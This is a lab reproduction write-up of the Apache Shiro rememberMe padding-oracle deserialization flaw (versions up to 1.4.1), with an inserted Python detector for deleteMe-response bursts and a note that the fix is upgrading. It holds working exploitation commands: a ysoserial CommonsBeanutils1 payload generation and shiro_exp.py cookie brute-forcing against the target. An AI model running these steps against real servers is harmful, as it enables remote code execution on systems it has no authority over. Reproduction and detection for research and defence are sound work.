Apache Shiro has a high-severity code execution vulnerability. The flaw lies in the rememberMe field of the Apache Shiro cookie, which is encrypted in AES-128-CBC mode: a user can craft a malicious rememberMe field with a Padding Oracle attack, re-send the request to the site, and trigger a deserialization attack that ultimately leads to arbitrary code execution.
Affected versions: Apache Shiro <= 1.4.1
Environment setup
docker pull vulfocus/shiro-721
docker run -d -p8080:8080 <image id>
Vulnerability reproduction
1. Open the login page at your-ip:8080/login.jsp
2. Log in with the Shiro test account to obtain a cookie (tick Remember Me):
(1) With a wrong username and password, the HTTP response sets a deleteMe cookie:
(2) With the correct username and password, no deleteMe cookie is set.
Given this behaviour, the approach is: start from a valid serialized cookie (which requires a known user credential), then use the Padding Oracle to append our own data after it (trailing junk after Java serialized data does not affect the deserialization result). Two cases arise:
- the crafted data fails the padding check and the server returns deleteMe;
- the crafted data decrypts with valid padding, is deserialized normally, and no deleteMe cookie is returned.
3. Log in with the correct username and password, tick RememberMe, capture the traffic and let the login request through.
After the login succeeds, read the rememberMe value from the Cookie.
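The two conditions above are also what a defender can watch for: the oracle only works because every bad-padding guess makes the server answer with a deleteMe cookie, and a padding oracle needs hundreds of guesses per block. The following Python script is an added example, not part of this write-up or of any Shiro tooling; it flags client IPs whose deleteMe responses spike within a short window. It assumes a custom access-log format whose last quoted field is the response's Set-Cookie header, and the log lines it analyses are constructed inline.

```python
"""Detect padding-oracle probing of Shiro's rememberMe cookie from access logs.

Added example, not part of the original write-up. Assumption: the access log
records the response's Set-Cookie header as the last quoted field (a custom
log format); the sample lines below are constructed for the demonstration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<setcookie>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def is_delete_me(setcookie):
    """True when the response told the client to discard its rememberMe cookie,
    which Shiro <= 1.4.1 does whenever decryption (including padding) fails."""
    return "rememberMe=deleteMe" in setcookie


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_probing(lines, threshold=20, window_seconds=60):
    """Return {ip: peak_count} for clients whose deleteMe responses reach
    `threshold` inside any `window_seconds` span.

    A real user triggers deleteMe a handful of times (wrong password, stale
    cookie). A CBC padding oracle needs up to 256 guesses per plaintext byte
    and 16 bytes per block, so it produces hundreds of deleteMe responses."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_delete_me(rec["setcookie"]):
            per_ip[rec["ip"]].append(rec["ts"])
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in per_ip.items():
        peak = max_in_window(stamps, window)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def build_sample_log():
    """Constructed log: 10.0.0.5 sends 40 tampered-cookie requests in 40 seconds
    (every reply sets deleteMe); 10.0.0.9 fails login twice, then succeeds."""
    base = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, status, setcookie):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return (f'{ip} - - [{ts}] "GET /account/ HTTP/1.1" {status} 0 '
                f'"{setcookie}"')

    lines = [line("10.0.0.5", i, 302, "rememberMe=deleteMe; Path=/; Max-Age=0")
             for i in range(40)]
    lines.append(line("10.0.0.9", 5, 302, "rememberMe=deleteMe; Path=/; Max-Age=0"))
    lines.append(line("10.0.0.9", 12, 302, "rememberMe=deleteMe; Path=/; Max-Age=0"))
    # constructed placeholder cookie value, not a real rememberMe token
    lines.append(line("10.0.0.9", 20, 200, "rememberMe=Q09OU1RSVUNURUQ=; Path=/"))
    return lines


if __name__ == "__main__":
    for ip, peak in detect_probing(build_sample_log()).items():
        print(f"possible padding-oracle probing from {ip}: "
              f"{peak} deleteMe responses in one minute")
```

The signal is the burst of deleteMe responses to a single client, regardless of what the rest of each request looks like; a threshold of tens per minute is far above what a real user's failed logins produce. The oracle itself was closed in Shiro 1.4.2, which moved rememberMe encryption from AES-CBC to AES-GCM, so upgrading is the fix; this detection is for hosts that cannot be upgraded yet.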
4. Use the Java deserialization tool ysoserial to generate a payload; the one here creates a file named test under the Tomcat root directory on the target:
Download link for ysoserial-master-2874a69f61-1.jar
java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class
5. Generate the evil rememberMe cookie with the Padding Oracle Attack:
Download and unpack the exploit, then:
cp payload.class shiro_rce_exp-master
cd shiro_rce_exp-master
python shiro_exp.py http://your-ip:8080/account/ <rememberMe value obtained earlier> payload.class
python2 shiro_exp.py http://your-ip:8080/account/ <rememberMe value obtained earlier> payload.class
6. Then comes a long wait...
Note: this exploit takes a long time to brute-force, so use ysoserial to generate a short payload for verification (e.g. ping or touch /tmp/test). It takes roughly 30+ minutes to produce a correct rememberMe cookie; the script stops automatically once it succeeds.
7. Authenticate with the evil rememberMe cookie to carry out the deserialization attack: copy the cookie and replay the request, and the command executes.
Replace the rememberMe obtained earlier with the brute-forced result and forward the request.
8. Check the result: the test file has been created.
docker exec -it <container id> /bin/bash
Reproduction successful.